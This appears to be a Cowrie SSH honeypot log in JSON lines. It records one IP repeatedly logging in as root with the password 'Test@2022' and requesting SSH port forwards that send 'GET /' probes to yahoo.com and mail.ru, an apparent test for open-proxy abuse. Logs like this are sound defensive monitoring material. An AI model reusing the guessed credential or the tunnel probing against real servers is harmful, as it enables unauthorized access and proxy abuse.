{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":6304,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:6304","sensor":"my-vps","timestamp":"2025-08-31T03:54:25.244278Z","session":"28dae21eb107"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:25.294123Z","src_ip":"77.83.207.83","session":"28dae21eb107"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:25.344664Z","src_ip":"77.83.207.83","session":"28dae21eb107"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":49770,"dst_ip":"1.2.3.4","dst_port":22,"session":"90bdccde28ab","protocol":"ssh","message":"New connection: 77.83.207.83:49770 (1.2.3.4:22) [session: 90bdccde28ab]","sensor":"my-vps","timestamp":"2025-08-31T03:54:25.395249Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:25.397182Z","src_ip":"77.83.207.83","session":"90bdccde28ab"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:25.448148Z","src_ip":"77.83.207.83","session":"90bdccde28ab"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:25.702887Z","src_ip":"77.83.207.83","session":"90bdccde28ab"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":14986,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:14986","sensor":"my-vps","timestamp":"2025-08-31T03:54:25.754890Z","session":"90bdccde28ab"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:25.806381Z","src_ip":"77.83.207.83","session":"90bdccde28ab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46878,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a335e5795bd","protocol":"ssh","message":"New connection: 212.227.125.160:46878 (1.2.3.4:22) [session: 5a335e5795bd]","sensor":"my-vps","timestamp":"2025-08-31T03:54:25.825050Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":26333,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:26333","sensor":"my-vps","timestamp":"2025-08-31T03:54:25.949452Z","session":"90bdccde28ab"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:26.000549Z","src_ip":"77.83.207.83","session":"90bdccde28ab"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":13847,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:13847","sensor":"my-vps","timestamp":"2025-08-31T03:54:26.145445Z","session":"90bdccde28ab"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:26.196599Z","src_ip":"77.83.207.83","session":"90bdccde28ab"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:26.248702Z","src_ip":"77.83.207.83","session":"90bdccde28ab"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":49862,"dst_ip":"1.2.3.4","dst_port":22,"session":"55407bd831d7","protocol":"ssh","message":"New connection: 77.83.207.83:49862 (1.2.3.4:22) [session: 55407bd831d7]","sensor":"my-vps","timestamp":"2025-08-31T03:54:26.297828Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:26.298726Z","src_ip":"77.83.207.83","session":"55407bd831d7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:26.349012Z","src_ip":"77.83.207.83","session":"55407bd831d7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:26.599805Z","src_ip":"77.83.207.83","session":"55407bd831d7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":4780,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:4780","sensor":"my-vps","timestamp":"2025-08-31T03:54:26.651101Z","session":"55407bd831d7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:26.701473Z","src_ip":"77.83.207.83","session":"55407bd831d7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":22583,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:22583","sensor":"my-vps","timestamp":"2025-08-31T03:54:26.844801Z","session":"55407bd831d7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:26.895189Z","src_ip":"77.83.207.83","session":"55407bd831d7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":26979,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:26979","sensor":"my-vps","timestamp":"2025-08-31T03:54:27.036770Z","session":"55407bd831d7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:27.087269Z","src_ip":"77.83.207.83","session":"55407bd831d7"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:27.138320Z","src_ip":"77.83.207.83","session":"55407bd831d7"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":49973,"dst_ip":"1.2.3.4","dst_port":22,"session":"c97832a21fc1","protocol":"ssh","message":"New connection: 77.83.207.83:49973 (1.2.3.4:22) [session: c97832a21fc1]","sensor":"my-vps","timestamp":"2025-08-31T03:54:27.187551Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:27.197155Z","src_ip":"77.83.207.83","session":"c97832a21fc1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:27.238353Z","src_ip":"77.83.207.83","session":"c97832a21fc1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:27.489571Z","src_ip":"77.83.207.83","session":"c97832a21fc1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":23053,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:23053","sensor":"my-vps","timestamp":"2025-08-31T03:54:27.540913Z","session":"c97832a21fc1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:27.591301Z","src_ip":"77.83.207.83","session":"c97832a21fc1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":30561,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:30561","sensor":"my-vps","timestamp":"2025-08-31T03:54:27.737167Z","session":"c97832a21fc1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:27.787561Z","src_ip":"77.83.207.83","session":"c97832a21fc1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":1544,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:1544","sensor":"my-vps","timestamp":"2025-08-31T03:54:27.928657Z","session":"c97832a21fc1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:27.979043Z","src_ip":"77.83.207.83","session":"c97832a21fc1"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:28.030231Z","src_ip":"77.83.207.83","session":"c97832a21fc1"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":50059,"dst_ip":"1.2.3.4","dst_port":22,"session":"1144867374cd","protocol":"ssh","message":"New connection: 77.83.207.83:50059 (1.2.3.4:22) [session: 1144867374cd]","sensor":"my-vps","timestamp":"2025-08-31T03:54:28.078564Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:28.088833Z","src_ip":"77.83.207.83","session":"1144867374cd"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:28.128405Z","src_ip":"77.83.207.83","session":"1144867374cd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:28.375358Z","src_ip":"77.83.207.83","session":"1144867374cd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":3744,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:3744","sensor":"my-vps","timestamp":"2025-08-31T03:54:28.425806Z","session":"1144867374cd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:28.475483Z","src_ip":"77.83.207.83","session":"1144867374cd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":4883,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:4883","sensor":"my-vps","timestamp":"2025-08-31T03:54:28.615844Z","session":"1144867374cd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:28.665258Z","src_ip":"77.83.207.83","session":"1144867374cd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":7050,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:7050","sensor":"my-vps","timestamp":"2025-08-31T03:54:28.807896Z","session":"1144867374cd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:28.857515Z","src_ip":"77.83.207.83","session":"1144867374cd"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:28.908558Z","src_ip":"77.83.207.83","session":"1144867374cd"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":50152,"dst_ip":"1.2.3.4","dst_port":22,"session":"587b82d4dc1c","protocol":"ssh","message":"New connection: 77.83.207.83:50152 (1.2.3.4:22) [session: 587b82d4dc1c]","sensor":"my-vps","timestamp":"2025-08-31T03:54:28.958481Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:28.959513Z","src_ip":"77.83.207.83","session":"587b82d4dc1c"}
{"eventid":"cowrie.session.closed","duration":12.749011278152466,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:28.985697Z","src_ip":"212.227.235.229","session":"9be4f3b08046"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:29.008994Z","src_ip":"77.83.207.83","session":"587b82d4dc1c"}
